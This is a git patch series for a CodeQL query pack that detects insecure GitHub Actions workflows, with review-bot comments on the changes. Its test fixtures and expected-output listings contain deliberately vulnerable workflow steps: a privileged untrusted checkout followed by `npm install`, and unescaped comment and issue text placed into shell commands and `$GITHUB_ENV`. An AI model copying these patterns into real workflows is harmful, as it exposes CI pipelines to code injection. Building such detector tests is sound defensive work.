@@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8bb9e02559c..3db6902ad2f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,7 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | 
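Review bot: This fixture has no comment naming its caller or the intended result, and the expected rows added in the same commit report its `npm install` step as "Execution of untrusted code on a privileged workflow" although the only caller visible in this patch, `reusable_caller3.yaml`, triggers on `pull_request`. If another caller exists outside this patch the row may be correct; otherwise the expected output pins what looks like a false positive at critical severity. A header comment such as `# called by reusable_caller3.yaml (on: pull_request)` plus the intended severity would make the test's purpose checkable. The same applies to the identical `reusable.yml` fixture under `reusable_workflows/TestOrg/TestRepo`, whose visible callers are `reusable_caller1.yaml` (`pull_request_target`) and `reusable_caller2.yaml` (`pull_request`).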
@@ -146,6 +147,7 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | | .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | 
@@ -205,6 +207,7 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | 
@@ -224,6 +227,7 @@ edges | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From 1dd7c3d2ef75b8d45b1f5ec2f1cdaf3ba9cc6c27 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 22 Sep 2024 22:06:35 +0200 Subject: [PATCH 0519/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8135237d6ce..ec2e82dfe01 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.48 +version: 0.1.49 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a40d5868789..70f493e1d64 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.48 +version: 0.1.49 groups: [actions, queries] suites: codeql-suites extractor: javascript From df59e6f5d29e796702900795e4bb72daaf878bb9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 10:18:29 +0200 Subject: [PATCH 0520/1267] Consider a Reusable Workflow privileged if a caller is --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +- .../dataflow/internal/DataFlowPublic.qll | 2 +- ql/test/library-tests/test.expected | 1575 +---------------- .../CWE-094/CodeInjectionMedium.expected | 4 + .../TestRepo/.github/workflows/formal.yml | 70 + .../CWE-829/.github/workflows/formal.yml | 12 + .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 8 files changed, 96 insertions(+), 1576 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2267c7ff694..d0eb440d0d5 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -2,6 +2,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Helper private import codeql.actions.config.Config +private import codeql.actions.DataFlow /** * Gets the length of each line in the StringValue . @@ -433,7 +434,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } ExternalJobImpl getACaller() { - result.getCallee() = this.getLocation().getFile().getRelativePath() + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 96568f86db3..fbaf44c282f 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -72,7 +72,7 @@ class CallNode extends ExprNode { CallNode() { this.getCfgNode() instanceof DataFlowCall } - string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } + DataFlowCallable getCalleeNode() { result = viableCallable(this.getCfgNode()) } } /** diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 9205675ac0f..fe5a2df8dd0 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
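Review bot: `getACaller()` in `ReusableWorkflowImpl` now resolves callers through `DataFlow::CallNode`, so the internal AST module imports `codeql.actions.DataFlow`, a library that is presumably itself built on the AST. This layering inversion deserves a comment, or the predicate could move to a layer above data flow. The predicate also lacks QLDoc; `/** Gets a job that calls this reusable workflow, as resolved by the data-flow call graph. */` would make clear that a caller the call graph cannot resolve is not returned. Since the commit title derives privilege from callers, the comment should also say how a reusable workflow with no resolved caller is classified, which this hunk does not show. The class body continues outside the hunk.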
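Review bot: `CallNode.getCallee()` is deleted outright from `DataFlowPublic.qll`, so any query outside this patch that still calls it stops compiling. Keeping it for a release as `deprecated string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() }` would avoid that. The replacement is named `getCalleeNode()` but returns a `DataFlowCallable`, not a node, so a name like `getACallable()` would describe it better. A one-line QLDoc such as `/** Gets a callable this call may resolve to, per viableCallable. */` is also missing. The `CallNode` class starts outside the hunk.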
@@ -1,1574 +1 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | -| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | -| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | -| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| 
.github/workflows/multiline2.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 
| Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses 
Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee 
-a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n 
echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && 
npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 
| github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | 
github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | 
